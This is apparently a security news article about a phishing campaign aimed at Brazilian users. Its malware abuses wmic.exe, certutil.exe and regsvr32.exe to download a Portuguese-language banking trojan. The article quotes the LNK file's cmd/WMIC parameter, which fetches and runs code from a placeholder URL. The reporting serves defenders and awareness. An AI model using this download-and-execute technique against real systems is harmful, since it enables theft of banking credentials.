Researchers discovered a new malware that abusing two legitimate windows files and use it against compromised victims to steal sensitive information.
One file wmic.exe is a command line utility and the other file certutil.exe is a program that manages certificates for Windows.
These files are used for download the payload on the infected windows machine and also other files that later used for malicious purpose.
Attackers using more evasion techniques in this campaign and both files are already used by other malware but current attack integrate both files.
Researchers believe that the cybercriminals behind the malware attack using powerful tools and techniques to perform more stealthy operations.
The initial stage of infection starts from the malicious email campaign that targeting users along with urgency notification content of postal service of Brazil to trick users to click the links inside of the email that posed as users missed the postal delivery attempt.
Attacker trick user to click the embedded link by saying that they can find the more details by clicking the link.
Once the victims click the link and the new windows pop-up that attempts to download a malicious Zip file.
According to Trend Micro report,Once the zip file is downloaded and extracted, the user will be presented with an LNK file (detected as Trojan.LNK.DLOADR.AUSUJM). The LNK file will then point to cmd.exe using the following parameter:
/k start /MIN %WINDIR$\\system32\\wbem\\WMIC.exe os get /format {URL} && exit
The cmd.exe is responsible for executing wmic.exe via the following parameter:
os get /format {URL}
After the execution of cmd.exe attempt to download and execute the command from its command & control server.
It drops the copy of the Windows Files certutil.exe in the %temp% folder in a different name and the next process involved to make an attempt to communicate with the new C&C server to download a new set of files.
Here comes the main payload which detected as TSPY_GUILDMA.C by Trend Micro and the researchers believes that the payload shows that it is a banking malware that only works when the target’s language is set to Portuguese.
Finally, the Payload will be executed on victims machine using regsvr32.exe to steal banking information such as transaction details and login credentials.
Java Usage Tracker Critical Flaw Enable Hackers to Inject Arbitrary Files on Windows Systems
A new project has exposed a critical attack vector that exploits protocol vulnerabilities to disrupt…
A threat actor known as #LongNight has reportedly put up for sale remote code execution…
Ivanti disclosed two critical vulnerabilities, identified as CVE-2025-4427 and CVE-2025-4428, affecting Ivanti Endpoint Manager Mobile…
Hackers are increasingly targeting macOS users with malicious clones of Ledger Live, the popular application…
The European Union has escalated its response to Russia’s ongoing campaign of hybrid threats, announcing…
Venice.ai has rapidly emerged as a disruptive force in the AI landscape, positioning itself as…